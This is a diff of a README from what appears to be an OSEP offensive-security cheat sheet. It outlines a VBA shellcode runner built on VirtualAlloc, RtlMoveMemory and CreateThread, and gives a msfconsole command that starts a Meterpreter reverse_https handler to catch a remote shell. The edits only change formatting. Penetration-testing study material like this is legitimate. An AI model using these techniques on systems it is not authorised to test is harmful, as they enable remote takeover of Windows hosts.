peterkhe1999/CheatSheet/OSEP/README.md

 ## VBA Shellcode Runner

-Use **VirtualAlloc** to allocate unmanaged memory that is writable, readable, and executable.
+Use `VirtualAlloc` to allocate unmanaged memory that is writable, readable, and executable.

-Copy the shellcode into the newly allocated memory with **RtlMoveMemory**, and
+Copy the shellcode into the newly allocated memory with `RtlMoveMemory`, and

-Create a new execution thread in the process through **CreateThread** to execute the shellcode.
+Create a new execution thread in the process through `CreateThread` to execute the shellcode.

-Meterpreter Handler (x86)
+`x86` Meterpreter Handler

 ```bash
 msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST 192.168.119.120;set LPORT 443;run;"